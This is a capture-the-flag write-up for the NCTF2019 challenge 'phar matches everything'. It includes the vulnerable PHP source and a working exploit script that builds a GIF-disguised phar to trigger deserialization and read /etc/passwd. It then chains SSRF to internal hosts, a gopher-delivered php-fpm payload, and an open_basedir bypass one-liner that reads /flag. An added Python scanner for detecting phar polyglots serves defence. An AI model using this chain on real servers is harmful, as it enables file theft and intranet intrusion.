[NCTF2019]phar matches everything
source link: https://yanmymickey.github.io/2020/05/02/CTF_WP/%5BNCTF2019%5Dphar%20matches%20everything/
Source code
<?php
class Easytest{
    protected $test;
    public function funny_get(){
        return $this->test;
    }
}
class Main {
    public $url;
    public function curl($url){
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
        $output=curl_exec($ch);
        curl_close($ch);
        return $output;
    }
    public function __destruct(){
        $this_is_a_easy_test=unserialize($_GET['careful']);
        if($this_is_a_easy_test->funny_get() === '1'){
            echo $this->curl($this->url);
        }
    }
}
if(isset($_POST["submit"])) {
    $check = getimagesize($_POST['name']);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
    } else {
        echo "File is not an image.";
    }
}
?>
Two deserializations are needed. The first uses getimagesize($file_path) to trigger phar deserialization; that deserialization acts on the Main class. The second is simple: test in Easytest must be '1', and then curl is used to read the file.
exp.php
<?php
// Run with phar.readonly=0 (e.g. php -d phar.readonly=0 exp.php), otherwise the Phar cannot be written.
class Easytest {
    protected $test = '1';
}
class Main {
    public $url = 'file:///etc/passwd';
}
$a = new Easytest();
echo serialize($a);
echo urlencode(serialize($a));   // value for the careful parameter
$b = new Main();
@unlink("exp.phar");
$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub('GIF89a' . "<?php __HALT_COMPILER(); ?>");   // GIF header so getimagesize() accepts the file
$phar->setMetadata($b);   // Main object is unserialized when the phar is opened via phar://
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
rename('exp.phar', 'exp.gif');
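Because the phar stub can start with any image header, getimagesize() alone cannot tell a GIF from a phar archive. The following Python scanner is an added example rather than the challenge's or the author's code: it parses the phar manifest of an uploaded file and reports the PHP classes named in its metadata (the objects unserialize() would create when the file is opened through phar://); the sample polyglot it checks is constructed inline.

```python
import re
import struct

HALT = b"__HALT_COMPILER();"


def extract_phar_metadata(blob: bytes):
    """Return the serialized metadata from a phar manifest, or None if the
    blob has no phar manifest. Layout per the phar file format: a stub ending
    in __HALT_COMPILER(); ?> (optional newline), then little-endian fields:
    manifest-len(4) file-count(4) api-version(2) flags(4) alias-len(4) alias
    metadata-len(4) metadata. File entries and signature follow; ignored here."""
    idx = blob.find(HALT)
    if idx == -1:
        return None
    pos = idx + len(HALT)
    tail = re.match(rb"\s*\?>\r?\n?", blob[pos:])
    if tail:
        pos += tail.end()
    if len(blob) < pos + 18:
        return None
    _manifest_len, _nfiles, _api, _flags, alias_len = struct.unpack_from("<IIHII", blob, pos)
    pos += 18 + alias_len
    if len(blob) < pos + 4:
        return None
    (meta_len,) = struct.unpack_from("<I", blob, pos)
    pos += 4
    return blob[pos:pos + meta_len]


def scan_upload(blob: bytes):
    """Classify an uploaded 'image': ('clean', []) or ('phar-polyglot', classes),
    where classes are the PHP class names found in the serialized metadata."""
    meta = extract_phar_metadata(blob)
    if meta is None:
        return ("clean", [])
    classes = re.findall(rb'O:\d+:"([^"]+)"', meta)
    return ("phar-polyglot", [c.decode() for c in classes])


def build_polyglot(metadata: bytes) -> bytes:
    """Constructed test fixture: a GIF89a-prefixed stub plus a manifest carrying
    the given metadata and no file entries (not a complete, signed archive)."""
    stub = b"GIF89a<?php __HALT_COMPILER(); ?>\r\n"
    body = struct.pack("<IHII", 0, 0x11, 0, 0) + struct.pack("<I", len(metadata)) + metadata
    return stub + struct.pack("<I", len(body)) + body


if __name__ == "__main__":
    sample = build_polyglot(b'O:4:"Main":1:{s:3:"url";s:18:"file:///etc/passwd";}')
    print(scan_upload(sample))   # ('phar-polyglot', ['Main'])
```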
First upload exp.gif, then pass parameters to catchmime.php to trigger the deserialization: careful triggers the second deserialization and name triggers the phar one. Change url to read the hosts file, since this challenge wants us to attack the intranet. I read 173.187.197.10; reading http://173.187.197.10 over the http protocol returns the current page, so read http://173.187.197.11 next.
php-fpm unauthorized access vulnerability. Use the exp from the link, then send the payload it generates over the gopher protocol. First run phpinfo(); which shows that open_basedir needs to be bypassed. Adding the open_basedir bypass payload is enough:
<?php mkdir('/tmp/fuck');chdir('/tmp/fuck');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(scandir('/'));readfile('/flag');?>
The flag is in the root directory.